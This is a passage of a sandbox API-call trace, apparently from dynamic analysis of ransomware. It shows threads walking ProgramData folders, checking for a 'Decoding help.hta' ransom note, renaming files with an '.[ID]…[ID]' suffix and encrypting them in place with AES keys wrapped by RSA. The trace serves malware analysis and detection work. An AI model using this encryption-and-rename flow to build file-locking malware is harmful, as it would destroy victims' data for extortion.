[0042.759] lstrcmpiW (lpString1="windows", lpString2="Task") returned 1 [0042.759] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*" [0042.759] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*") returned 49 [0042.759] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\", lpString2="Task" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" [0042.759] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*" [0042.759] GlobalMemoryStatus (in: lpBuffer=0xda8fd10 | out: lpBuffer=0xda8fd10) [0042.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d6ebb8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x700 [0042.765] CloseHandle (hObject=0x700) returned 1 [0042.765] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xda8fd30 | out: lpFindFileData=0xda8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 0 [0042.765] FindClose (in: hFindFile=0x6718b0 | out: hFindFile=0x6718b0) returned 1 Thread: id = 328 os_tid = 0x5a8 [0042.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*", lpFindFileData=0x15e9fd30 | out: lpFindFileData=0x15e9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6718f0 [0042.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.530] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x15e9fd30 | out: lpFindFileData=0x15e9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.530] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.530] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x15e9fd30 | out: lpFindFileData=0x15e9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0042.530] FindClose (in: hFindFile=0x6718f0 | out: hFindFile=0x6718f0) returned 1 Thread: id = 329 os_tid = 0x440 [0042.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*.*", lpFindFileData=0x15fdfd30 | out: lpFindFileData=0x15fdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6718f0 [0042.531] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.531] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x15fdfd30 | out: lpFindFileData=0x15fdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.531] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.531] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.531] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x15fdfd30 | out: lpFindFileData=0x15fdfd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 1 [0042.531] lstrcmpW (lpString1=".", lpString2="Server") returned -1 [0042.531] lstrcmpW (lpString1="..", lpString2="Server") returned -1 [0042.531] lstrcmpiW (lpString1="windows", lpString2="Server") returned 1 [0042.764] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*.*" [0042.764] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*.*") returned 40 [0042.764] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\", lpString2="Server" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server" [0042.764] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*" [0042.764] GlobalMemoryStatus (in: lpBuffer=0x15fdfd10 | out: lpBuffer=0x15fdfd10) [0042.764] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11681940, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x69c [0042.767] CloseHandle (hObject=0x69c) returned 1 [0042.767] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x15fdfd30 | out: lpFindFileData=0x15fdfd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 0 [0042.768] FindClose (in: hFindFile=0x6718f0 | out: hFindFile=0x6718f0) returned 1 Thread: id = 330 os_tid = 0x59c [0042.766] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*.*", lpFindFileData=0x1611fd30 | out: lpFindFileData=0x1611fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671870 [0042.766] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.766] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0x1611fd30 | out: lpFindFileData=0x1611fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.766] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.766] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.766] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0x1611fd30 | out: lpFindFileData=0x1611fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0042.766] lstrcmpW (lpString1=".", lpString2="logs") returned -1 [0042.766] lstrcmpW (lpString1="..", lpString2="logs") returned -1 [0042.766] lstrcmpiW (lpString1="windows", lpString2="logs") returned 1 [0042.766] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*.*" [0042.767] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*.*") returned 42 [0042.767] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\", lpString2="logs" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs" [0042.767] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*.*" [0042.767] GlobalMemoryStatus (in: lpBuffer=0x1611fd10 | out: lpBuffer=0x1611fd10) [0042.767] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5be80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0042.776] CloseHandle (hObject=0x658) returned 1 [0042.776] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0x1611fd30 | out: lpFindFileData=0x1611fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 0 [0042.776] FindClose (in: hFindFile=0x671870 | out: hFindFile=0x671870) returned 1 Thread: id = 331 os_tid = 0x6e4 [0042.775] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\*.*", lpFindFileData=0x1625fd30 | out: lpFindFileData=0x1625fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db2f8 [0042.775] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.775] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x1625fd30 | out: lpFindFileData=0x1625fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.775] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.775] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.775] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x1625fd30 | out: lpFindFileData=0x1625fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Views", cAlternateFileName="")) returned 1 [0042.775] lstrcmpW (lpString1=".", lpString2="Views") returned -1 [0042.775] lstrcmpW (lpString1="..", lpString2="Views") returned -1 [0042.775] lstrcmpiW (lpString1="windows", lpString2="Views") returned 1 [0042.775] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\*.*" [0042.775] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\*.*") returned 49 [0042.775] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\", lpString2="Views" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views" [0042.775] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*" [0042.775] GlobalMemoryStatus (in: lpBuffer=0x1625fd10 | out: lpBuffer=0x1625fd10) [0042.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109b89a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6ac [0042.790] CloseHandle (hObject=0x6ac) returned 1 [0042.790] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x1625fd30 | out: lpFindFileData=0x1625fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Views", cAlternateFileName="")) returned 0 [0042.791] FindClose (in: hFindFile=0x5db2f8 | out: hFindFile=0x5db2f8) returned 1 Thread: id = 332 os_tid = 0x7ec [0042.788] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*", lpFindFileData=0x1639fd30 | out: lpFindFileData=0x1639fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x225b9190, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x225b9190, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671870 [0042.788] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.788] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0x1639fd30 | out: lpFindFileData=0x1639fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x225b9190, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x225b9190, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.788] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.788] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.789] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0x1639fd30 | out: lpFindFileData=0x1639fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x223c9fb0, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x223c9fb0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x223c9fb0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0042.789] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*" [0042.789] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned 48 [0042.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\Decoding help.hta" [0042.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\decoding help.hta")) returned 0x1 [0042.789] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0042.789] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0x1639fd30 | out: lpFindFileData=0x1639fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd591378b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd591378b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac29de1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3d00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlconfig.dll.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="PPCRLC~1._ID")) returned 1 [0042.789] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*" [0042.789] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned 48 [0042.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\Decoding help.hta" [0042.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\decoding help.hta")) returned 0x1 [0042.789] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ppcrlconfig.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0042.789] lstrlenW (lpString="ppcrlconfig.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned 40 [0042.789] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0042.789] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0x1639fd30 | out: lpFindFileData=0x1639fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 1 [0042.789] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*" [0042.789] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned 48 [0042.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\Decoding help.hta" [0042.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\decoding help.hta")) returned 0x1 [0042.790] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ppcrlui.dll") returned -1 [0042.790] lstrlenW (lpString="ppcrlui.dll") returned 11 [0042.790] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*" [0042.790] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned 48 [0042.790] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\", lpString2="ppcrlui.dll" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll" [0042.790] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll" [0042.790] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlui.dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x568 [0042.800] CreateFileMappingA (hFile=0x568, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6ac [0042.800] CryptAcquireContextA (in: phProv=0x1639fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1639fcec*=0x3448940) returned 1 [0042.801] CryptGenKey (in: hProv=0x3448940, Algid=0x6610, dwFlags=0x1, phKey=0x1639fce8 | out: phKey=0x1639fce8*=0x5db2f8) returned 1 [0042.801] CryptExportKey (in: hKey=0x5db2f8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1639fbe4, pdwDataLen=0x1639fce4 | out: pbData=0x1639fbe4*, pdwDataLen=0x1639fce4*=0x2c) returned 1 [0042.801] MapViewOfFile (hFileMappingObject=0x6ac, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e100) returned 0x15ea0000 [0042.823] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1639fbe4*, pdwDataLen=0x1639fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1639fbe4*, pdwDataLen=0x1639fcf8*=0x100) returned 1 [0042.823] CryptEncrypt (in: hKey=0x5db2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x15ea0000, pdwDataLen=0x1639fce4*=0x3e100, dwBufLen=0x3e100 | out: pbData=0x15ea0000*, pdwDataLen=0x1639fce4*=0x3e100) returned 1 [0043.024] UnmapViewOfFile (lpBaseAddress=0x15ea0000) returned 1 [0043.028] CloseHandle (hObject=0x6ac) returned 1 [0043.028] CryptDestroyKey (hKey=0x5db2f8) returned 1 [0043.028] CryptReleaseContext (hProv=0x3448940, dwFlags=0x0) returned 1 [0043.028] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x0, lpNewFilePointer=0x0, 